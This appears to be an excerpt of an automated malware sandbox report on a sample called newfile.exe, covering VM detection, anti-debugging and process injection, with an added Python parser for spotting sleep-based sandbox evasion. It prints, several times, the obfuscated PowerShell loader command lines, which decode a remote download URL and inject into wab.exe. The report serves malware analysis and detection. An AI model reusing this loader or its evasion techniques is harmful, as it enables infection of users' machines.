            Source: newfile.exe, 00000018.00000002.2053144761.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}/
            Source: powershell.exe, 00000005.00000002.2075429320.00000225F4C6A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
            Source: wab.exe, 00000012.00000002.2590450166.00000000220A4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
            Source: wscript.exe, 00000001.00000002.1276421727.0000021453814000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}RAGE#V
            Source: wab.exe, 00000012.00000003.2163783606.000000000668D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2573561659.000000000668D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163783606.000000000665C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2573561659.000000000665D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
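            Read together, the entries above are the loader's stalling and fingerprinting stage: thread 4140 in wab.exe issues a long run of sleeps, each about 110 shorter than the one before (98093, 97983, 97874, ...), so no two calls look alike and the sum of the 60 delays listed comes to well over an hour if the values are milliseconds, far past any sandbox's run time; the same process then enumerates Win32_BaseBoard, Win32_ComputerSystem and Win32_Processor, the WMI classes whose manufacturer and model strings expose VMware and Hyper-V, which fits the VMware strings found in its memory. The Python below is an added example written for this page, not part of the Joe Sandbox report or its tooling. It parses report lines in the fused form shown above (a constructed sample copied from this section is embedded), groups sleeps per thread, flags a decrementing countdown loop whose total exceeds an assumed five-minute analysis budget, and lists the fingerprinting classes each process queried. Two assumptions are worth stating: the sleep values are treated as milliseconds (the report prints an "s" suffix, but only millisecond Sleep arguments fit the magnitudes), and the delay value 922337203685477 is treated as .NET's TimeSpan.MaxValue in milliseconds (Int64.MaxValue ticks divided by 10000), which is how an infinite wait inside PowerShell itself shows up to the monitor, so it is reported separately instead of being added to the countdown.

```python
import re
from collections import defaultdict

# Constructed sample: entries copied from this report's evasion section, in the
# fused "wab.exeTID: 4140Thread sleep time ..." form the extraction produced.
SAMPLE_REPORT = r"""
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -98093s >= -30000sJump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -97983s >= -30000sJump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -97874s >= -30000sJump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -97765s >= -30000sJump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -97656s >= -30000sJump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -97546s >= -30000sJump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -97437s >= -30000sJump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4140Thread sleep time: -97327s >= -30000sJump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 100000Jump to behavior
"""

SLEEP_RE = re.compile(r"^Source: (?P<proc>.+?\.exe)\s*TID: (?P<tid>\d+)\s*Thread sleep time: -(?P<ms>\d+)s")
DELAY_RE = re.compile(r"^Source: (?P<proc>.+?\.exe)\s*Thread delayed: delay time: (?P<ms>\d+)")
WMI_RE = re.compile(r"^Source: (?P<proc>.+?\.exe)\s*WMI Queries: \S+ - (?P<ns>\S+) : (?P<query>.+)$")
RESIDUE_RE = re.compile(r"Jump to behavior\s*$")   # navigation residue from the report page

# Assumption: .NET TimeSpan.MaxValue in ms (Int64.MaxValue ticks / 10000) is what
# an infinite WaitOne inside PowerShell looks like to the delay monitor.
DOTNET_TIMESPAN_MAX_MS = (2**63 - 1) // 10_000

# WMI classes whose instances carry hypervisor vendor strings; every one of
# these is queried somewhere in this report.
VM_FINGERPRINT_CLASSES = {"Win32_BaseBoard", "Win32_ComputerSystem", "Win32_Processor",
                          "Win32_VideoController", "Win32_NetworkAdapter"}


def wmi_class(query: str) -> str:
    """Class name from a bare class (CreateInstanceEnum) or a WQL SELECT (ExecQuery)."""
    m = re.search(r"\bfrom\s+(\w+)", query, re.I)
    return m.group(1) if m else query.strip()


def parse_report(text: str) -> dict:
    """Group the report's evasion entries by process (and by thread for sleeps)."""
    sleeps, delays, wmi = defaultdict(list), defaultdict(list), defaultdict(set)
    for raw in text.splitlines():
        line = RESIDUE_RE.sub("", raw.strip())
        if m := SLEEP_RE.match(line):
            sleeps[(m["proc"], int(m["tid"]))].append(int(m["ms"]))
        elif m := DELAY_RE.match(line):
            delays[m["proc"]].append(int(m["ms"]))
        elif m := WMI_RE.match(line):
            wmi[m["proc"]].add(wmi_class(m["query"]))
    return {"sleeps": dict(sleeps), "delays": dict(delays), "wmi": dict(wmi)}


def classify_sleeps(values: list, budget_ms: int = 5 * 60 * 1000) -> dict:
    """Characterise one thread's sleep sequence: a countdown loop is many sleeps,
    each slightly shorter than the last, whose sum outlasts the analysis budget
    (assumed here to be five minutes)."""
    steps = [a - b for a, b in zip(values, values[1:])]
    total = sum(values)
    return {
        "count": len(values),
        "total_ms": total,
        "monotone_decreasing": bool(steps) and all(s > 0 for s in steps),
        "mean_step_ms": (values[0] - values[-1]) / (len(values) - 1) if len(values) > 1 else 0.0,
        "exceeds_budget": total > budget_ms,
        # small, strictly positive decrements (under 1% of the first sleep) over 5+ calls
        "countdown_loop": len(values) >= 5 and all(0 < s < 0.01 * values[0] for s in steps),
    }


def infinite_waits(delays: dict) -> list:
    """Processes whose delays include the TimeSpan.MaxValue sentinel."""
    return sorted(p for p, v in delays.items() if DOTNET_TIMESPAN_MAX_MS in v)


def vm_fingerprint_queries(wmi: dict) -> dict:
    """Per process, the fingerprinting classes it enumerated."""
    return {p: sorted(c & VM_FINGERPRINT_CLASSES) for p, c in wmi.items() if c & VM_FINGERPRINT_CLASSES}


if __name__ == "__main__":
    parsed = parse_report(SAMPLE_REPORT)
    for (proc, tid), values in parsed["sleeps"].items():
        print(proc, tid, classify_sleeps(values))
    print("infinite waits:", infinite_waits(parsed["delays"]))
    print("VM fingerprinting:", vm_fingerprint_queries(parsed["wmi"]))
```

            Feed the full "Malware Analysis System Evasion" section of a report to parse_report to get the complete countdown; the "Thread sleep time" and "Thread delayed" entries describe the same calls (one keyed by thread, one not), so the two should not be added together.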

            Anti Debugging

            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_021C70B8 CheckRemoteDebuggerPresent, 18_2_021C70B8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_0750E145 LdrInitializeThunk, 13_2_0750E145
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Code function: 22_2_005F2A7E GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree, 22_2_005F2A7E
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Code function: 22_2_005F3450 SetUnhandledExceptionFilter, 22_2_005F3450
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Code function: 22_2_005F32C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 22_2_005F32C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3660000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 21CFEC8
            Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. 
hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl 
BeebgSp,eanordknibuld nxan
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coleoptilum.Unw && echo $"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. 
hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl 
BeebgSp,eanordknibuld nxan
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coleoptilum.Unw && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$utmmeligheds = 1;$skimme='substrin';$skimme+='g';function fritidsmuligheds($udrejseforbuddene){$valetism=$udrejseforbuddene.length-$utmmeligheds;for($syring=5; $syring -lt $valetism; $syring+=(6)){$fundamentalismen+=$udrejseforbuddene.$skimme.invoke($syring, $utmmeligheds);}$fundamentalismen;}function exuberate($lavrss){&($arbejdsvrelser) ($lavrss);}$flokkede=fritidsmuligheds ' feltm dumpoholdfztorreiddsfjl ihukl.ennaa trol/hydro5 byst.mosdy0,yrin hoved(krydswmoderinat.inhvntrdfagopohapt windves si.e sprinnbakketafsyn smukk1spids0 flue. garg0coper;le.te kahiwbr.ndiiodo.nyndet6 uls4nonco;heire s.inkxsynsh6 bier4lgeu ; kara bojsdraktievp.ege:krige1tan.p2ha.de1overm.enhus0propi) tage nargigstilheeg,trcdclasken,ososvnig/tykm.2svang0oks,p1parac0para.0g.lva1 bull0jasmi1over. dikerf badeiconcer bra,eunderfdepaiobyggextange/ unis1pharm2 atr.1 tj n. 
hens0homop ';$medicopsychological=fritidsmuligheds ' befluagi,ns lac eove,frpolya-apoteawardegtre cesa,kenpo.tot,wist ';$infection=fritidsmuligheds ',ingmhmodhat afmgtdissop cilis au,o:flamb/ seku/ ,elnd extrruds,yiparagv pseue fati.drowngevighobr.ttoorg,ngkrakelmikroeundep.fo micaffalopanermwe eg/van butiresc usrp?decolep.enyx an.lpproduofootlrspooftbaand= slutdch.huofo,skwbeic,n forhlpictoo.uropalagridopsam&vindeicommedmissi=upbla1john,hcoldnpravnembetjer ber wkn.glx nstedtrforwtrninncarioi trbe6sportxcount5 vvefgerhveyskuess sweemcolpeih,len9kandivsign.6tarmreskimokco,cijtvangz begii entrt met,1buglega gel-retretprog.t erve ';$noncombustible173=fritidsmuligheds 'botet>trskn ';$arbejdsvrelser=fritidsmuligheds 'selviisuperein skxbredb ';$museumsgenstande='haplessnesses';exuberate (fritidsmuligheds 'rustfsr ppeeunquotpa,as-lnforcreubeosmovsntransttweene costnbesantscler ejnar-electpunaddalobeltflusthafhng ilittneigh:unlar\ gul s,oninobeha,maheyrbtriale .remrpestii footsreno.hgylte. nutlt v.luxda.nitcigar mi.k- rt svlindaasta.nlcavalu iliaefun,t godmo$ ultrmhim eu.affesklarledelf uekspamsalams lommgbenchehnsesn resisl,mbetclevea patensteridpistoescrei;su,fe ');exuberate (fritidsmuligheds ' a,niidendrffortr i.raf(elefatunspieski.dstermittid,e-li iepsmiggatal ht overh gulv u,tet rors:t.aum\scarlsflyttotilhymcame,bunc,aehaandrsyri.iter is uhaahbiory.retint lumixprobit rrlg) expi{concleredbuxf.deri galmtc.ort} ledd;.ksam ');$chaussebrolgningens = fritidsmuligheds 'chan.erenticwh.elhmyarioo ist fibr%lgnera edlgpgrsropmyrekdkapitalivsvtgrapla,utde%capen\quinocsadacostrmhl bahue snniosummapans,atbengnietchilinc.nuo.erammoudi.sordiuslagtnvkstrwstran despo& hjl&heter peakemetamcharmohstumpoghost .eapf$sepul ';exuberate (fritidsmuligheds ' itch$ afrigneotel fejloku,esbsen,eaunspilsams,:oprres siveufandaprecogppregelpistei sk,nc sionaverdethalvfeun.il= m dn(inddacmytilm skoldstilg m nha/fortrcanted u.gdo$trretcsprouhskilbalamm,u a emse entsskaaremudpubtmre,rvelloounderl 
beebgsp,eanordknibuld nxan
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$utmmeligheds = 1;$skimme='substrin';$skimme+='g';function fritidsmuligheds($udrejseforbuddene){$valetism=$udrejseforbuddene.length-$utmmeligheds;for($syring=5; $syring -lt $valetism; $syring+=(6)){$fundamentalismen+=$udrejseforbuddene.$skimme.invoke($syring, $utmmeligheds);}$fundamentalismen;}function exuberate($lavrss){&($arbejdsvrelser) ($lavrss);}$flokkede=fritidsmuligheds ' feltm dumpoholdfztorreiddsfjl ihukl.ennaa trol/hydro5 byst.mosdy0,yrin hoved(krydswmoderinat.inhvntrdfagopohapt windves si.e sprinnbakketafsyn smukk1spids0 flue. garg0coper;le.te kahiwbr.ndiiodo.nyndet6 uls4nonco;heire s.inkxsynsh6 bier4lgeu ; kara bojsdraktievp.ege:krige1tan.p2ha.de1overm.enhus0propi) tage nargigstilheeg,trcdclasken,ososvnig/tykm.2svang0oks,p1parac0para.0g.lva1 bull0jasmi1over. dikerf badeiconcer bra,eunderfdepaiobyggextange/ unis1pharm2 atr.1 tj n. 
hens0homop ';$medicopsychological=fritidsmuligheds ' befluagi,ns lac eove,frpolya-apoteawardegtre cesa,kenpo.tot,wist ';$infection=fritidsmuligheds ',ingmhmodhat afmgtdissop cilis au,o:flamb/ seku/ ,elnd extrruds,yiparagv pseue fati.drowngevighobr.ttoorg,ngkrakelmikroeundep.fo micaffalopanermwe eg/van butiresc usrp?decolep.enyx an.lpproduofootlrspooftbaand= slutdch.huofo,skwbeic,n forhlpictoo.uropalagridopsam&vindeicommedmissi=upbla1john,hcoldnpravnembetjer ber wkn.glx nstedtrforwtrninncarioi trbe6sportxcount5 vvefgerhveyskuess sweemcolpeih,len9kandivsign.6tarmreskimokco,cijtvangz begii entrt met,1buglega gel-retretprog.t erve ';$noncombustible173=fritidsmuligheds 'botet>trskn ';$arbejdsvrelser=fritidsmuligheds 'selviisuperein skxbredb ';$museumsgenstande='haplessnesses';exuberate (fritidsmuligheds 'rustfsr ppeeunquotpa,as-lnforcreubeosmovsntransttweene costnbesantscler ejnar-electpunaddalobeltflusthafhng ilittneigh:unlar\ gul s,oninobeha,maheyrbtriale .remrpestii footsreno.hgylte. nutlt v.luxda.nitcigar mi.k- rt svlindaasta.nlcavalu iliaefun,t godmo$ ultrmhim eu.affesklarledelf uekspamsalams lommgbenchehnsesn resisl,mbetclevea patensteridpistoescrei;su,fe ');exuberate (fritidsmuligheds ' a,niidendrffortr i.raf(elefatunspieski.dstermittid,e-li iepsmiggatal ht overh gulv u,tet rors:t.aum\scarlsflyttotilhymcame,bunc,aehaandrsyri.iter is uhaahbiory.retint lumixprobit rrlg) expi{concleredbuxf.deri galmtc.ort} ledd;.ksam ');$chaussebrolgningens = fritidsmuligheds 'chan.erenticwh.elhmyarioo ist fibr%lgnera edlgpgrsropmyrekdkapitalivsvtgrapla,utde%capen\quinocsadacostrmhl bahue snniosummapans,atbengnietchilinc.nuo.erammoudi.sordiuslagtnvkstrwstran despo& hjl&heter peakemetamcharmohstumpoghost .eapf$sepul ';exuberate (fritidsmuligheds ' itch$ afrigneotel fejloku,esbsen,eaunspilsams,:oprres siveufandaprecogppregelpistei sk,nc sionaverdethalvfeun.il= m dn(inddacmytilm skoldstilg m nha/fortrcanted u.gdo$trretcsprouhskilbalamm,u a emse entsskaaremudpubtmre,rvelloounderl 
beebgsp,eanordknibuld nxan
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$utmmeligheds = 1;$skimme='substrin';$skimme+='g';function fritidsmuligheds($udrejseforbuddene){$valetism=$udrejseforbuddene.length-$utmmeligheds;for($syring=5; $syring -lt $valetism; $syring+=(6)){$fundamentalismen+=$udrejseforbuddene.$skimme.invoke($syring, $utmmeligheds);}$fundamentalismen;}function exuberate($lavrss){&($arbejdsvrelser) ($lavrss);}$flokkede=fritidsmuligheds ' feltm dumpoholdfztorreiddsfjl ihukl.ennaa trol/hydro5 byst.mosdy0,yrin hoved(krydswmoderinat.inhvntrdfagopohapt windves si.e sprinnbakketafsyn smukk1spids0 flue. garg0coper;le.te kahiwbr.ndiiodo.nyndet6 uls4nonco;heire s.inkxsynsh6 bier4lgeu ; kara bojsdraktievp.ege:krige1tan.p2ha.de1overm.enhus0propi) tage nargigstilheeg,trcdclasken,ososvnig/tykm.2svang0oks,p1parac0para.0g.lva1 bull0jasmi1over. dikerf badeiconcer bra,eunderfdepaiobyggextange/ unis1pharm2 atr.1 tj n. 
hens0homop ';$medicopsychological=fritidsmuligheds ' befluagi,ns lac eove,frpolya-apoteawardegtre cesa,kenpo.tot,wist ';$infection=fritidsmuligheds ',ingmhmodhat afmgtdissop cilis au,o:flamb/ seku/ ,elnd extrruds,yiparagv pseue fati.drowngevighobr.ttoorg,ngkrakelmikroeundep.fo micaffalopanermwe eg/van butiresc usrp?decolep.enyx an.lpproduofootlrspooftbaand= slutdch.huofo,skwbeic,n forhlpictoo.uropalagridopsam&vindeicommedmissi=upbla1john,hcoldnpravnembetjer ber wkn.glx nstedtrforwtrninncarioi trbe6sportxcount5 vvefgerhveyskuess sweemcolpeih,len9kandivsign.6tarmreskimokco,cijtvangz begii entrt met,1buglega gel-retretprog.t erve ';$noncombustible173=fritidsmuligheds 'botet>trskn ';$arbejdsvrelser=fritidsmuligheds 'selviisuperein skxbredb ';$museumsgenstande='haplessnesses';exuberate (fritidsmuligheds 'rustfsr ppeeunquotpa,as-lnforcreubeosmovsntransttweene costnbesantscler ejnar-electpunaddalobeltflusthafhng ilittneigh:unlar\ gul s,oninobeha,maheyrbtriale .remrpestii footsreno.hgylte. nutlt v.luxda.nitcigar mi.k- rt svlindaasta.nlcavalu iliaefun,t godmo$ ultrmhim eu.affesklarledelf uekspamsalams lommgbenchehnsesn resisl,mbetclevea patensteridpistoescrei;su,fe ');exuberate (fritidsmuligheds ' a,niidendrffortr i.raf(elefatunspieski.dstermittid,e-li iepsmiggatal ht overh gulv u,tet rors:t.aum\scarlsflyttotilhymcame,bunc,aehaandrsyri.iter is uhaahbiory.retint lumixprobit rrlg) expi{concleredbuxf.deri galmtc.ort} ledd;.ksam ');$chaussebrolgningens = fritidsmuligheds 'chan.erenticwh.elhmyarioo ist fibr%lgnera edlgpgrsropmyrekdkapitalivsvtgrapla,utde%capen\quinocsadacostrmhl bahue snniosummapans,atbengnietchilinc.nuo.erammoudi.sordiuslagtnvkstrwstran despo& hjl&heter peakemetamcharmohstumpoghost .eapf$sepul ';exuberate (fritidsmuligheds ' itch$ afrigneotel fejloku,esbsen,eaunspilsams,:oprres siveufandaprecogppregelpistei sk,nc sionaverdethalvfeun.il= m dn(inddacmytilm skoldstilg m nha/fortrcanted u.gdo$trretcsprouhskilbalamm,u a emse entsskaaremudpubtmre,rvelloounderl 
beebgsp,eanordknibuld nxanJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$utmmeligheds = 1;$skimme='substrin';$skimme+='g';function fritidsmuligheds($udrejseforbuddene){$valetism=$udrejseforbuddene.length-$utmmeligheds;for($syring=5; $syring -lt $valetism; $syring+=(6)){$fundamentalismen+=$udrejseforbuddene.$skimme.invoke($syring, $utmmeligheds);}$fundamentalismen;}function exuberate($lavrss){&($arbejdsvrelser) ($lavrss);}$flokkede=fritidsmuligheds ' feltm dumpoholdfztorreiddsfjl ihukl.ennaa trol/hydro5 byst.mosdy0,yrin hoved(krydswmoderinat.inhvntrdfagopohapt windves si.e sprinnbakketafsyn smukk1spids0 flue. garg0coper;le.te kahiwbr.ndiiodo.nyndet6 uls4nonco;heire s.inkxsynsh6 bier4lgeu ; kara bojsdraktievp.ege:krige1tan.p2ha.de1overm.enhus0propi) tage nargigstilheeg,trcdclasken,ososvnig/tykm.2svang0oks,p1parac0para.0g.lva1 bull0jasmi1over. dikerf badeiconcer bra,eunderfdepaiobyggextange/ unis1pharm2 atr.1 tj n. 
